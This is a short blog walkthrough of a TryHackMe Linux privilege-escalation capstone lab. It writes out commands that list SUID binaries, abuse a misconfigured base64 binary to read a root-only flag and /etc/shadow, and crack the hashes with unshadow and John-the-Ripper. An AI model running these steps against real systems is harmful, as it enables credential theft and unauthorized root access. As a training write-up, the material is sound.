TryHackMe Linux Privesc Capstone: A Quick Internal Pentest to Gain Root

TryHackMe Linux Privesc Capstone: A Quick Internal Pentest to Gain Root

ยท

2 min read

Table of contents

This walkthrough will go over the Linux Privilege Escalation Capstone found on TryHackMe. The objective is to assess your understanding gained from the prior course content by placing you in an internal environment where you already possess low-level privileges on a Linux server. Your task is to identify an attack vector that enables you to escalate your privileges to root.

Ready, set, go!

First, we want to check and see if there is a cron job that we can exploit.

cat /etc/crontab

There's nothing for us here. Let's proceed to see which binaries are available for us to run with sudo privileges.

find / -type f -perm -04000 -ls 2>/dev/null

We can exploit the base64 binary with incorrect permissions to obtain the root flag.

LFILE=/home/rootflag/flag2.txt
base64 "$LFILE" | base64 --decode

Well, that worked for obtaining the root flag! Acquiring flag1 was a bit more challenging and required the use of unshadow. This command merges the passwd and shadow files into a single file, which can then be utilized by John-the-Ripper to crack passwords.

LFILE=/etc/shadow
base64 "$LFILE" | base64 -- decode

Copy and save the content into a shadow.txt file.

Grab the contents from passwd.

cat /etc/passwd

Copy and save the content into a passwd.txt file.

Combine the files and use John-the-Ripper to crack the passwords:

unshadow passwd.txt shadow.txt > passwords.txt
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt

Now that we have obtained missy's account password, we can switch users and retrieve the final flag from her Documents folder:

/home/missy/documents

Summary

In this walkthrough, we explore the Linux Privilege Escalation Capstone on TryHackMe, aiming to escalate our privileges to root. We begin by checking for exploitable cron jobs and identifying binaries with sudo privileges. We exploit the base64 binary to obtain the root flag and use unshadow and John-the-Ripper to crack passwords and retrieve the final flag from missy's Documents folder.

Did you find this article valuable?

Support Jake Garrison by becoming a sponsor. Any amount is appreciated!

ย